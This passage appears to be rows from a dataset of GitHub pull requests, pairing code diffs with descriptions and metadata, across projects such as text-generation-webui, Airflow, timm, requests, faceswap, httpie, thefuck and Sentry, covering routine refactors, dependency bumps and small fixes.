- shared.history['visible'][-1] = [visible_text, visible_reply]
- if not shared.args.no_stream:
- yield shared.history['visible']
+ shared.history['internal'][-1] = [text, reply]
+ shared.history['visible'][-1] = [visible_text, visible_reply]
+ yield shared.history['visible']
if next_character_found:
break
@@ -188,7 +195,6 @@ def chatbot_wrapper(text, state, regenerate=False, _continue=False):
def impersonate_wrapper(text, state):
-
if shared.model_name == 'None' or shared.model is None:
print("No model is loaded! Select one in the Model tab.")
yield ''
@@ -202,7 +208,6 @@ def impersonate_wrapper(text, state):
# Yield *Is typing...*
yield shared.processing_message
-
for i in range(state['chat_generation_attempts']):
reply = None
for reply in generate_reply(f"{prompt}{' ' if len(cumulative_reply) > 0 else ''}{cumulative_reply}", state, eos_token=eos_token, stopping_strings=stopping_strings):
@@ -227,23 +232,16 @@ def regenerate_wrapper(text, state):
if (len(shared.history['visible']) == 1 and not shared.history['visible'][0][0]) or len(shared.history['internal']) == 0:
yield chat_html_wrapper(shared.history['visible'], state['name1'], state['name2'], state['mode'])
else:
- last_visible = shared.history['visible'].pop()
- last_internal = shared.history['internal'].pop()
- # Yield '*Is typing...*'
- yield chat_html_wrapper(shared.history['visible'] + [[last_visible[0], shared.processing_message]], state['name1'], state['name2'], state['mode'])
- for history in chatbot_wrapper(last_internal[0], state, regenerate=True):
- shared.history['visible'][-1] = [last_visible[0], history[-1][1]]
- yield chat_html_wrapper(shared.history['visible'], state['name1'], state['name2'], state['mode'])
+ for history in chatbot_wrapper('', state, regenerate=True):
+ yield chat_html_wrapper(history, state['name1'], state['name2'], state['mode'])
def continue_wrapper(text, state):
if (len(shared.history['visible']) == 1 and not shared.history['visible'][0][0]) or len(shared.history['internal']) == 0:
yield chat_html_wrapper(shared.history['visible'], state['name1'], state['name2'], state['mode'])
else:
- # Yield ' ...'
- yield chat_html_wrapper(shared.history['visible'][:-1] + [[shared.history['visible'][-1][0], shared.history['visible'][-1][1] + ' ...']], state['name1'], state['name2'], state['mode'])
- for history in chatbot_wrapper(shared.history['internal'][-1][0], state, _continue=True):
- yield chat_html_wrapper(shared.history['visible'], state['name1'], state['name2'], state['mode'])
+ for history in chatbot_wrapper('', state, _continue=True):
+ yield chat_html_wrapper(history, state['name1'], state['name2'], state['mode'])
def remove_last_message(name1, name2, mode):
@@ -281,6 +279,7 @@ def send_dummy_reply(text, name1, name2, mode):
if len(shared.history['visible']) > 0 and not shared.history['visible'][-1][1] == '':
shared.history['visible'].append(['', ''])
shared.history['internal'].append(['', ''])
+
shared.history['visible'][-1][1] = text
shared.history['internal'][-1][1] = apply_extensions("input", text)
return chat_html_wrapper(shared.history['visible'], name1, name2, mode)
@@ -300,7 +299,6 @@ def clear_chat_log(name1, name2, greeting, mode):
# Save cleared logs
save_history(mode)
-
return chat_html_wrapper(shared.history['visible'], name1, name2, mode)
@@ -321,8 +319,8 @@ def tokenize_dialogue(dialogue, name1, name2, mode):
for i in range(len(idx) - 1):
messages.append(dialogue[idx[i]:idx[i + 1]].strip())
- messages.append(dialogue[idx[-1]:].strip())
+ messages.append(dialogue[idx[-1]:].strip())
entry = ['', '']
for i in messages:
if i.startswith(f'{name1}:'):
@@ -331,6 +329,7 @@ def tokenize_dialogue(dialogue, name1, name2, mode):
entry[1] = i[len(f'{name2}:'):].strip()
if not (len(entry[0]) == 0 and len(entry[1]) == 0):
history.append(entry)
+
entry = ['', '']
print("\033[1;32;1m\nDialogue tokenized to:\033[0;37;0m\n", end='')
@@ -339,6 +338,7 @@ def tokenize_dialogue(dialogue, name1, name2, mode):
print("\n")
for line in column.strip().split('\n'):
print("| " + line + "\n")
+
print("|\n")
print("------------------------------")
@@ -351,14 +351,17 @@ def save_history(mode, timestamp=False):
if mode == 'instruct':
if not timestamp:
return
+
fname = f"Instruct_{datetime.now().strftime('%Y%m%d-%H%M%S')}.json"
else:
if timestamp:
fname = f"{shared.character}_{datetime.now().strftime('%Y%m%d-%H%M%S')}.json"
else:
fname = f"{shared.character}_persistent.json"
+
if not Path('logs').exists():
Path('logs').mkdir()
+
with open(Path(f'logs/{fname}'), 'w', encoding='utf-8') as f:
f.write(json.dumps({'data': shared.history['internal'], 'data_visible': shared.history['visible']}, indent=2))
@@ -389,8 +392,10 @@ def build_pygmalion_style_context(data):
context = ""
if 'char_persona' in data and data['char_persona'] != '':
context += f"{data['char_name']}'s Persona: {data['char_persona']}\n"
+
if 'world_scenario' in data and data['world_scenario'] != '':
context += f"Scenario: {data['world_scenario']}\n"
+
context = f"{context.strip()}\n<START>\n"
return context
@@ -405,6 +410,7 @@ def generate_pfp_cache(character):
img = make_thumbnail(Image.open(path))
img.save(Path('cache/pfp_character.png'), format='PNG')
return img
+
return None
@@ -488,13 +494,17 @@ def upload_character(json_file, img, tavern=False):
while Path(f'characters/{outfile_name}.json').exists():
outfile_name = f'{data["char_name"]}_{i:03d}'
i += 1
+
if tavern:
outfile_name = f'TavernAI-{outfile_name}'
+
with open(Path(f'characters/{outfile_name}.json'), 'w', encoding='utf-8') as f:
f.write(json_file)
+
if img is not None:
img = Image.open(io.BytesIO(img))
img.save(Path(f'characters/{outfile_name}.png'))
+
print(f'New character saved to "characters/{outfile_name}.json".')
return outfile_name
| https://api.github.com/repos/oobabooga/text-generation-webui/pulls/1509 | 2023-04-24T03:41:59Z | 2023-04-24T03:47:41Z | 2023-04-24T03:47:41Z | 2023-05-08T03:18:35Z | 3,134 | oobabooga/text-generation-webui | 26,090 | |
Add .bash extension to SSHOperator | diff --git a/airflow/providers/ssh/operators/ssh.py b/airflow/providers/ssh/operators/ssh.py
index 69deb49b2b74a..7d72fe1150867 100644
--- a/airflow/providers/ssh/operators/ssh.py
+++ b/airflow/providers/ssh/operators/ssh.py
@@ -63,7 +63,14 @@ class SSHOperator(BaseOperator):
"""
template_fields: Sequence[str] = ("command", "environment", "remote_host")
- template_ext: Sequence[str] = (".sh",)
+ template_ext: Sequence[str] = (
+ ".sh",
+ ".bash",
+ ".csh",
+ ".zsh",
+ ".dash",
+ ".ksh",
+ )
template_fields_renderers = {
"command": "bash",
"environment": "python",
| New `.bash` extension was added to `SSHOperator` into template_ext | https://api.github.com/repos/apache/airflow/pulls/28617 | 2022-12-28T07:35:31Z | 2022-12-28T15:42:22Z | 2022-12-28T15:42:22Z | 2022-12-28T15:48:42Z | 193 | apache/airflow | 14,626 |
Use `torch.repeat_interleave()` to generate repeated indices faster | diff --git a/timm/data/distributed_sampler.py b/timm/data/distributed_sampler.py
index fa403d0acc..1609018963 100644
--- a/timm/data/distributed_sampler.py
+++ b/timm/data/distributed_sampler.py
@@ -103,15 +103,16 @@ def __iter__(self):
g = torch.Generator()
g.manual_seed(self.epoch)
if self.shuffle:
- indices = torch.randperm(len(self.dataset), generator=g).tolist()
+ indices = torch.randperm(len(self.dataset), generator=g)
else:
- indices = list(range(len(self.dataset)))
+ indices = torch.arange(start=0, end=len(self.dataset))
# produce repeats e.g. [0, 0, 0, 1, 1, 1, 2, 2, 2....]
- indices = [x for x in indices for _ in range(self.num_repeats)]
+ indices = torch.repeat_interleave(indices, repeats=self.num_repeats, dim=0)
# add extra samples to make it evenly divisible
padding_size = self.total_size - len(indices)
- indices += indices[:padding_size]
+ if padding_size > 0:
+ indices = torch.cat([indices, indices[:padding_size]], dim=0)
assert len(indices) == self.total_size
# subsample per rank
@@ -125,4 +126,4 @@ def __len__(self):
return self.num_selected_samples
def set_epoch(self, epoch):
- self.epoch = epoch
\ No newline at end of file
+ self.epoch = epoch
| ## Change Log
* Use `torch.repeat_interleave()` to generate the repeated indices faster
* Add `EOF`
## Performance Benchmark
* Python 3.7
* OS : Windows 10
* CPU : i7-7700K (not overclocked)
<details>
<summary>code</summary>
```
from time import time
import numpy as np
import torch
def get_indices_v1(x, num_repeats: int = 3):
return [i for i in x for _ in range(num_repeats)]
def get_indices_v2(x, num_repeats: int = 3):
return np.repeat(x, repeats=num_repeats, axis=0).tolist()
def get_indices_v3(x, num_repeats: int = 3):
return torch.repeat_interleave(x, repeats=num_repeats, dim=0).tolist()
if __name__ == '__main__':
for num_datasets in (int(1e5), int(1e6), int(1e7)):
indices: torch.Tensor = torch.arange(start=0, end=num_datasets)
v1, v2, v3 = [], [], []
for _ in range(10):
start_time = time()
_ = get_indices_v1(indices.tolist())
end_time = time()
v1.append(end_time - start_time)
start_time = time()
_ = get_indices_v2(indices.tolist())
end_time = time()
v2.append(end_time - start_time)
start_time = time()
_ = get_indices_v3(indices)
end_time = time()
v3.append(end_time - start_time)
print(f'num_datasets {num_datasets}')
print(f'list comprehension : {np.mean(v1):.6f}s')
print(f'np.repeat : {np.mean(v2):.6f}s')
print(f'torch.repeat_interleave : {np.mean(v3):.6f}s')
print()
```
</details>
```
num_datasets 100000
list comprehension : 0.031251s
np.repeat : 0.015623s
torch.repeat_interleave : 0.009376s
num_datasets 1000000
list comprehension : 0.292203s
np.repeat : 0.132806s
torch.repeat_interleave : 0.129676s
num_datasets 10000000
list comprehension : 2.788492s
np.repeat : 1.306345s
torch.repeat_interleave : 1.042842s
``` | https://api.github.com/repos/huggingface/pytorch-image-models/pulls/1058 | 2021-12-27T03:15:28Z | 2022-01-02T22:01:06Z | 2022-01-02T22:01:06Z | 2022-01-02T22:01:06Z | 352 | huggingface/pytorch-image-models | 16,181 |
Bump github/codeql-action from 3.22.11 to 3.23.0 | diff --git a/.github/workflows/codeql-analysis.yml b/.github/workflows/codeql-analysis.yml
index 4f0eebf29e..c03a8a7ca8 100644
--- a/.github/workflows/codeql-analysis.yml
+++ b/.github/workflows/codeql-analysis.yml
@@ -45,7 +45,7 @@ jobs:
# Initializes the CodeQL tools for scanning.
- name: Initialize CodeQL
- uses: github/codeql-action/init@b374143c1149a9115d881581d29b8390bbcbb59c # v3.22.11
+ uses: github/codeql-action/init@e5f05b81d5b6ff8cfa111c80c22c5fd02a384118 # v3.23.0
with:
languages: "python"
# If you wish to specify custom queries, you can do so here or in a config file.
@@ -56,7 +56,7 @@ jobs:
# Autobuild attempts to build any compiled languages (C/C++, C#, or Java).
# If this step fails, then you should remove it and run the build manually (see below)
- name: Autobuild
- uses: github/codeql-action/autobuild@b374143c1149a9115d881581d29b8390bbcbb59c # v3.22.11
+ uses: github/codeql-action/autobuild@e5f05b81d5b6ff8cfa111c80c22c5fd02a384118 # v3.23.0
# ℹ️ Command-line programs to run using the OS shell.
# 📚 https://git.io/JvXDl
@@ -70,4 +70,4 @@ jobs:
# make release
- name: Perform CodeQL Analysis
- uses: github/codeql-action/analyze@b374143c1149a9115d881581d29b8390bbcbb59c # v3.22.11
+ uses: github/codeql-action/analyze@e5f05b81d5b6ff8cfa111c80c22c5fd02a384118 # v3.23.0
| Bumps [github/codeql-action](https://github.com/github/codeql-action) from 3.22.11 to 3.23.0.
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a href="https://github.com/github/codeql-action/blob/main/CHANGELOG.md">github/codeql-action's changelog</a>.</em></p>
<blockquote>
<h1>CodeQL Action Changelog</h1>
<p>See the <a href="https://github.com/github/codeql-action/releases">releases page</a> for the relevant changes to the CodeQL CLI and language packs.</p>
<p>Note that the only difference between <code>v2</code> and <code>v3</code> of the CodeQL Action is the node version they support, with <code>v3</code> running on node 20 while we continue to release <code>v2</code> to support running on node 16. For example <code>3.22.11</code> was the first <code>v3</code> release and is functionally identical to <code>2.22.11</code>. This approach ensures an easy way to track exactly which features are included in different versions, indicated by the minor and patch version numbers.</p>
<h2>[UNRELEASED]</h2>
<p>No user facing changes.</p>
<h2>3.23.0 - 08 Jan 2024</h2>
<ul>
<li>We are rolling out a feature in January 2024 that will disable Python dependency installation by default for all users. This improves the speed of analysis while having only a very minor impact on results. You can override this behavior by setting <code>CODEQL_ACTION_DISABLE_PYTHON_DEPENDENCY_INSTALLATION=false</code> in your workflow, however we plan to remove this ability in future versions of the CodeQL Action. <a href="https://redirect.github.com/github/codeql-action/pull/2031">#2031</a></li>
<li>The CodeQL Action now requires CodeQL version 2.11.6 or later. For more information, see <a href="https://github.com/github/codeql-action/blob/main/#2227---16-nov-2023">the corresponding changelog entry for CodeQL Action version 2.22.7</a>. <a href="https://redirect.github.com/github/codeql-action/pull/2009">#2009</a></li>
</ul>
<h2>3.22.12 - 22 Dec 2023</h2>
<ul>
<li>Update default CodeQL bundle version to 2.15.5. <a href="https://redirect.github.com/github/codeql-action/pull/2047">#2047</a></li>
</ul>
<h2>3.22.11 - 13 Dec 2023</h2>
<ul>
<li>[v3+ only] The CodeQL Action now runs on Node.js v20. <a href="https://redirect.github.com/github/codeql-action/pull/2006">#2006</a></li>
</ul>
<h2>2.22.10 - 12 Dec 2023</h2>
<ul>
<li>Update default CodeQL bundle version to 2.15.4. <a href="https://redirect.github.com/github/codeql-action/pull/2016">#2016</a></li>
</ul>
<h2>2.22.9 - 07 Dec 2023</h2>
<p>No user facing changes.</p>
<h2>2.22.8 - 23 Nov 2023</h2>
<ul>
<li>Update default CodeQL bundle version to 2.15.3. <a href="https://redirect.github.com/github/codeql-action/pull/2001">#2001</a></li>
</ul>
<h2>2.22.7 - 16 Nov 2023</h2>
<ul>
<li>Add a deprecation warning for customers using CodeQL version 2.11.5 and earlier. These versions of CodeQL were discontinued on 8 November 2023 alongside GitHub Enterprise Server 3.7, and will be unsupported by CodeQL Action v2.23.0 and later. <a href="https://redirect.github.com/github/codeql-action/pull/1993">#1993</a>
<ul>
<li>If you are using one of these versions, please update to CodeQL CLI version 2.11.6 or later. For instance, if you have specified a custom version of the CLI using the 'tools' input to the 'init' Action, you can remove this input to use the default version.</li>
<li>Alternatively, if you want to continue using a version of the CodeQL CLI between 2.10.5 and 2.11.5, you can replace <code>github/codeql-action/*@v2</code> by <code>github/codeql-action/*@v2.22.7</code> in your code scanning workflow to ensure you continue using this version of the CodeQL Action.</li>
</ul>
</li>
</ul>
<h2>2.22.6 - 14 Nov 2023</h2>
<ul>
<li>Customers running Python analysis on macOS using version 2.14.6 or earlier of the CodeQL CLI should upgrade to CodeQL CLI version 2.15.0 or later. If you do not wish to upgrade the CodeQL CLI, ensure that you are using Python version 3.11 or earlier, as CodeQL version 2.14.6 and earlier do not support Python 3.12. You can achieve this by adding a <a href="https://github.com/actions/setup-python"><code>setup-python</code></a> step to your code scanning workflow before the step that invokes <code>github/codeql-action/init</code>.</li>
<li>Update default CodeQL bundle version to 2.15.2. <a href="https://redirect.github.com/github/codeql-action/pull/1978">#1978</a></li>
</ul>
<h2>2.22.5 - 27 Oct 2023</h2>
<p>No user facing changes.</p>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a href="https://github.com/github/codeql-action/commit/e5f05b81d5b6ff8cfa111c80c22c5fd02a384118"><code>e5f05b8</code></a> Merge pull request <a href="https://redirect.github.com/github/codeql-action/issues/2066">#2066</a> from github/update-v3.23.0-fd55bb0b0</li>
<li><a href="https://github.com/github/codeql-action/commit/48e7b8b751b457ccde050d587c85ce3defc30555"><code>48e7b8b</code></a> Update changelog for v3.23.0</li>
<li><a href="https://github.com/github/codeql-action/commit/fd55bb0b00b5802fdceb93f76b498f105e0edbe1"><code>fd55bb0</code></a> Merge pull request <a href="https://redirect.github.com/github/codeql-action/issues/2065">#2065</a> from github/henrymercer/further-run-queries-cleanup</li>
<li><a href="https://github.com/github/codeql-action/commit/838a0229829cd641a4a60fc3c95e12a673b5fcdb"><code>838a022</code></a> Clean up running queries workflow now that the queries are determined by the CLI</li>
<li><a href="https://github.com/github/codeql-action/commit/8516954d603e47049b34f3da4dfac83009fcd450"><code>8516954</code></a> Merge pull request <a href="https://redirect.github.com/github/codeql-action/issues/2062">#2062</a> from github/henrymercer/remove-action-config-parsing</li>
<li><a href="https://github.com/github/codeql-action/commit/a533ec62b3aeb59c7467569705b9edaca021df43"><code>a533ec6</code></a> Merge branch 'main' into henrymercer/remove-action-config-parsing</li>
<li><a href="https://github.com/github/codeql-action/commit/08ae9bf4d0d441bd9dcf6c2d80742c9fd2bf3cf0"><code>08ae9bf</code></a> Merge pull request <a href="https://redirect.github.com/github/codeql-action/issues/2063">#2063</a> from github/henrymercer/remove-ml-powered-queries-repo</li>
<li><a href="https://github.com/github/codeql-action/commit/58ff74adc38e087ca7f6670dfe24cd319aea5f11"><code>58ff74a</code></a> Merge pull request <a href="https://redirect.github.com/github/codeql-action/issues/2031">#2031</a> from github/rasmuswl/no-dep-inst-default</li>
<li><a href="https://github.com/github/codeql-action/commit/9926570d4c48228ba780bd02a18a4e05dbb1bbe7"><code>9926570</code></a> Generate JS</li>
<li><a href="https://github.com/github/codeql-action/commit/2e27b3c56bdb1864f5dd58da25fee61f6cd7bb81"><code>2e27b3c</code></a> Create helper <code>isPythonDependencyInstallationDisabled</code></li>
<li>Additional commits viewable in <a href="https://github.com/github/codeql-action/compare/b374143c1149a9115d881581d29b8390bbcbb59c...e5f05b81d5b6ff8cfa111c80c22c5fd02a384118">compare view</a></li>
</ul>
</details>
<br />
[](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)
Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.
[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)
---
<details>
<summary>Dependabot commands and options</summary>
<br />
You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
</details> | https://api.github.com/repos/psf/requests/pulls/6619 | 2024-01-08T17:01:38Z | 2024-01-08T17:56:01Z | 2024-01-08T17:56:01Z | 2024-01-08T17:56:02Z | 503 | psf/requests | 32,444 |
fix: specific TensorFlow version to the latest 1.x(1.13.1) since it is incompatible with TensorFlow 2.x API | diff --git a/Dockerfile.cpu b/Dockerfile.cpu
index 3ddabd49e0..7bfa5d4cab 100755
--- a/Dockerfile.cpu
+++ b/Dockerfile.cpu
@@ -1,4 +1,4 @@
-FROM tensorflow/tensorflow:latest-py3
+FROM tensorflow/tensorflow:1.12.0-py3
RUN apt-get update -qq -y \
&& apt-get install -y libsm6 libxrender1 libxext-dev python3-tk\
diff --git a/Dockerfile.gpu b/Dockerfile.gpu
index 94f64c0a76..5a8a8c320b 100755
--- a/Dockerfile.gpu
+++ b/Dockerfile.gpu
@@ -1,4 +1,4 @@
-FROM tensorflow/tensorflow:latest-gpu-py3
+FROM tensorflow/tensorflow:1.12.0-gpu-py3
RUN apt-get update -qq -y \
&& apt-get install -y libsm6 libxrender1 libxext-dev python3-tk\
| Docker tensorflow/tensorflow:latest-gpu-py3 and tensorflow/tensorflow:latest-py3 has linked to TensorFLow 2.0.0a0 which leads to faceswap run into crash. | https://api.github.com/repos/deepfakes/faceswap/pulls/675 | 2019-03-20T02:59:37Z | 2019-03-21T15:55:15Z | 2019-03-21T15:55:15Z | 2019-03-21T15:55:16Z | 243 | deepfakes/faceswap | 18,774 |
Limit concurrency of our test workflow | diff --git a/.github/workflows/tests.yml b/.github/workflows/tests.yml
index 17d03d3eef..dfd6a8e381 100644
--- a/.github/workflows/tests.yml
+++ b/.github/workflows/tests.yml
@@ -1,4 +1,7 @@
name: Tests
+concurrency:
+ group: ${{ github.head_ref || github.run_id }}
+ cancel-in-progress: true
on:
push:
| This seems to be useful to reduce our CI times (e.g pushing 2 commits one after another would block the last commit, since the workflows would be allocated by the first commit. This is making the second cancel the first). See [see the documentation](https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#example-using-a-fallback-value) for more details. | https://api.github.com/repos/httpie/cli/pulls/1353 | 2022-04-14T08:49:36Z | 2022-04-14T14:38:28Z | 2022-04-14T14:38:28Z | 2022-04-14T14:38:28Z | 102 | httpie/cli | 34,062 |
Updated the sendEmail function parameter typo | diff --git a/JARVIS/JARVIS.py b/JARVIS/JARVIS.py
index e16d242097..306ce10160 100644
--- a/JARVIS/JARVIS.py
+++ b/JARVIS/JARVIS.py
@@ -49,7 +49,7 @@ def speak_news():
speak('These were the top headlines, Have a nice day Sir!!..')
-def sendEmail(do, content):
+def sendEmail(to, content):
server = smtplib.SMTP('smtp.gmail.com', 587)
server.ehlo()
server.starttls()
| https://api.github.com/repos/geekcomputers/Python/pulls/1264 | 2021-01-02T10:09:38Z | 2021-01-02T17:07:13Z | 2021-01-02T17:07:13Z | 2021-01-02T17:07:13Z | 130 | geekcomputers/Python | 31,417 | |
#N/A: Use git_branch_exists rule with `checkout` too | diff --git a/tests/rules/test_git_branch_exists.py b/tests/rules/test_git_branch_exists.py
index b41b0a413..e2122320e 100644
--- a/tests/rules/test_git_branch_exists.py
+++ b/tests/rules/test_git_branch_exists.py
@@ -12,22 +12,23 @@ def stderr(branch_name):
def new_command(branch_name):
return [cmd.format(branch_name) for cmd in [
'git branch -d {0} && git branch {0}',
- 'git branch -D {0} && git branch {0}', 'git checkout {0}']]
+ 'git branch -d {0} && git checkout -b {0}',
+ 'git branch -D {0} && git branch {0}',
+ 'git branch -D {0} && git checkout -b {0}', 'git checkout {0}']]
@pytest.mark.parametrize('script, branch_name', [
- ('git branch foo', 'foo'),
- ('git branch bar', 'bar')])
+ ('git branch foo', 'foo'), ('git checkout bar', 'bar')])
def test_match(stderr, script, branch_name):
assert match(Command(script=script, stderr=stderr))
-@pytest.mark.parametrize('script', ['git branch foo', 'git branch bar'])
+@pytest.mark.parametrize('script', ['git branch foo', 'git checkout bar'])
def test_not_match(script):
assert not match(Command(script=script, stderr=''))
@pytest.mark.parametrize('script, branch_name, ', [
- ('git branch foo', 'foo'), ('git branch bar', 'bar')])
+ ('git branch foo', 'foo'), ('git checkout bar', 'bar')])
def test_get_new_command(stderr, new_command, script, branch_name):
assert get_new_command(Command(script=script, stderr=stderr)) == new_command
diff --git a/thefuck/rules/git_branch_exists.py b/thefuck/rules/git_branch_exists.py
index a2c007888..25b7e5060 100644
--- a/thefuck/rules/git_branch_exists.py
+++ b/thefuck/rules/git_branch_exists.py
@@ -6,8 +6,7 @@
@git_support
def match(command):
- return ('branch' in command.script
- and "fatal: A branch named '" in command.stderr
+ return ("fatal: A branch named '" in command.stderr
and " already exists." in command.stderr)
@@ -17,7 +16,9 @@ def get_new_command(command):
branch_name = re.findall(
r"fatal: A branch named '([^']*)' already exists.", command.stderr)[0]
new_command_templates = [['git branch -d {0}', 'git branch {0}'],
+ ['git branch -d {0}', 'git checkout -b {0}'],
['git branch -D {0}', 'git branch {0}'],
+ ['git branch -D {0}', 'git checkout -b {0}'],
['git checkout {0}']]
for new_command_template in new_command_templates:
yield shell.and_(*new_command_template).format(branch_name)
| What it solves and how: 
Please review and comment.
| https://api.github.com/repos/nvbn/thefuck/pulls/530 | 2016-07-21T18:00:24Z | 2016-07-22T10:11:05Z | 2016-07-22T10:11:05Z | 2016-08-11T02:24:09Z | 676 | nvbn/thefuck | 30,706 |
Fixed filename patterns sanitizing | diff --git a/modules/images.py b/modules/images.py
index 530a8440b96..d17072632f1 100644
--- a/modules/images.py
+++ b/modules/images.py
@@ -245,34 +245,42 @@ def resize_image(resize_mode, im, width, height):
invalid_filename_chars = '<>:"/\\|?*\n'
+invalid_filename_prefix = ' '
+invalid_filename_postfix = ' .'
re_nonletters = re.compile(r'[\s'+string.punctuation+']+')
+max_filename_part_length = 128
+max_prompt_words = 8
def sanitize_filename_part(text, replace_spaces=True):
if replace_spaces:
text = text.replace(' ', '_')
- return text.translate({ord(x): '_' for x in invalid_filename_chars})[:128]
+ text = text.translate({ord(x): '_' for x in invalid_filename_chars})
+ text = text.lstrip(invalid_filename_prefix)[:max_filename_part_length]
+ text = text.rstrip(invalid_filename_postfix)
+ return text
def apply_filename_pattern(x, p, seed, prompt):
if seed is not None:
x = x.replace("[seed]", str(seed))
+
if prompt is not None:
- x = x.replace("[prompt]", sanitize_filename_part(prompt)[:128])
- x = x.replace("[prompt_spaces]", sanitize_filename_part(prompt, replace_spaces=False)[:128])
+ x = x.replace("[prompt]", sanitize_filename_part(prompt))
+ x = x.replace("[prompt_spaces]", sanitize_filename_part(prompt, replace_spaces=False))
if "[prompt_words]" in x:
words = [x for x in re_nonletters.split(prompt or "") if len(x) > 0]
if len(words) == 0:
words = ["empty"]
+ x = x.replace("[prompt_words]", sanitize_filename_part(" ".join(words[0:max_prompt_words]), replace_spaces=False))
- x = x.replace("[prompt_words]", " ".join(words[0:8]).strip())
if p is not None:
x = x.replace("[steps]", str(p.steps))
x = x.replace("[cfg]", str(p.cfg_scale))
x = x.replace("[width]", str(p.width))
x = x.replace("[height]", str(p.height))
- x = x.replace("[sampler]", sd_samplers.samplers[p.sampler_index].name)
+ x = x.replace("[sampler]", sanitize_filename_part(sd_samplers.samplers[p.sampler_index].name, replace_spaces=False))
x = x.replace("[model_hash]", shared.sd_model.sd_model_hash)
x = x.replace("[date]", datetime.date.today().isoformat())
| The following file patterns are invalid on Windows.
- Begin or end with the ASCII Space (0x20)
- End with the ASCII Period (0x2E)
For example, if `[prompt_spaces]` is specified as the directory name pattern, sometimes file saving may fail. | https://api.github.com/repos/AUTOMATIC1111/stable-diffusion-webui/pulls/743 | 2022-09-20T06:21:49Z | 2022-09-20T06:46:45Z | 2022-09-20T06:46:45Z | 2022-09-20T06:48:22Z | 577 | AUTOMATIC1111/stable-diffusion-webui | 40,632 |
Add seaborn | diff --git a/README.md b/README.md
index fcf7c395b..dd0e8393f 100644
--- a/README.md
+++ b/README.md
@@ -980,6 +980,7 @@ Inspired by [awesome-php](https://github.com/ziadoz/awesome-php).
* [pygraphviz](https://pypi.python.org/pypi/pygraphviz) - Python interface to [Graphviz](http://www.graphviz.org/).
* [PyQtGraph](http://www.pyqtgraph.org/) - Interactive and realtime 2D/3D/Image plotting and science/engineering widgets.
* [SnakeViz](http://jiffyclub.github.io/snakeviz/) - A browser based graphical viewer for the output of Python's cProfile module.
+* [seaborn](https://github.com/mwaskom/seaborn) - Statistical data visualization using matplotlib.
* [vincent](https://github.com/wrobstory/vincent) - A Python to Vega translator.
* [VisPy](http://vispy.org/) - High-performance scientific visualization based on OpenGL.
| ## What is this Python project?
Seaborn is a Python visualization library based on matplotlib. It provides a high-level interface for drawing attractive statistical graphics.
## What's the difference between this Python project and similar ones?
- Several built-in themes that improve on the default matplotlib aesthetics
- Tools for choosing color palettes to make beautiful plots that reveal patterns in your data
- Functions for visualizing univariate and bivariate distributions or for comparing them between subsets of data
- Tools that fit and visualize linear regression models for different kinds of independent and dependent variables
- Functions that visualize matrices of data and use clustering algorithms to discover structure in those matrices
- A function to plot statistical timeseries data with flexible estimation and representation of uncertainty around the estimate
- High-level abstractions for structuring grids of plots that let you easily build complex visualizations
Anyone who agrees with this pull request could vote for it by adding a :+1: to it, and usually, the maintainer will merge it when votes reach **20**.
| https://api.github.com/repos/vinta/awesome-python/pulls/713 | 2016-08-28T12:26:03Z | 2016-09-13T06:36:56Z | 2016-09-13T06:36:56Z | 2016-09-13T06:36:56Z | 241 | vinta/awesome-python | 27,038 |
ref: Remove "eventstore.use-nodestore" feature switch | diff --git a/src/sentry/api/endpoints/event_apple_crash_report.py b/src/sentry/api/endpoints/event_apple_crash_report.py
index eb79bd595a4f0e..15131841ab3ebf 100644
--- a/src/sentry/api/endpoints/event_apple_crash_report.py
+++ b/src/sentry/api/endpoints/event_apple_crash_report.py
@@ -4,7 +4,7 @@
from django.http import HttpResponse, StreamingHttpResponse
-from sentry import eventstore, options
+from sentry import eventstore
from sentry.api.bases.project import ProjectEndpoint
from sentry.api.exceptions import ResourceDoesNotExist
from sentry.lang.native.applecrashreport import AppleCrashReport
@@ -24,9 +24,6 @@ def get(self, request, project, event_id):
if event is None:
raise ResourceDoesNotExist
- if not options.get("eventstore.use-nodestore"):
- event.bind_node_data()
-
if event.platform not in ("cocoa", "native"):
return HttpResponse(
{"message": "Only cocoa events can return an apple crash report"}, status=403
diff --git a/src/sentry/api/endpoints/event_file_committers.py b/src/sentry/api/endpoints/event_file_committers.py
index 099686801c500a..7616bf90a9ca32 100644
--- a/src/sentry/api/endpoints/event_file_committers.py
+++ b/src/sentry/api/endpoints/event_file_committers.py
@@ -2,7 +2,7 @@
from rest_framework.response import Response
-from sentry import eventstore, options
+from sentry import eventstore
from sentry.api.bases.project import ProjectEndpoint
from sentry.models import Commit, Release
from sentry.utils.committers import get_serialized_event_file_committers
@@ -26,10 +26,6 @@ def get(self, request, project, event_id):
if event is None:
return Response({"detail": "Event not found"}, status=404)
- # populate event data
- if not options.get("eventstore.use-nodestore"):
- event.bind_node_data()
-
try:
committers = get_serialized_event_file_committers(
project, event, frame_limit=int(request.GET.get("frameLimit", 25))
diff --git a/src/sentry/api/endpoints/event_grouping_info.py b/src/sentry/api/endpoints/event_grouping_info.py
index 9b3bd1a3616734..416f15c63d4450 100644
--- a/src/sentry/api/endpoints/event_grouping_info.py
+++ b/src/sentry/api/endpoints/event_grouping_info.py
@@ -4,7 +4,7 @@
from django.http import HttpResponse
-from sentry import eventstore, options
+from sentry import eventstore
from sentry.api.bases.project import ProjectEndpoint
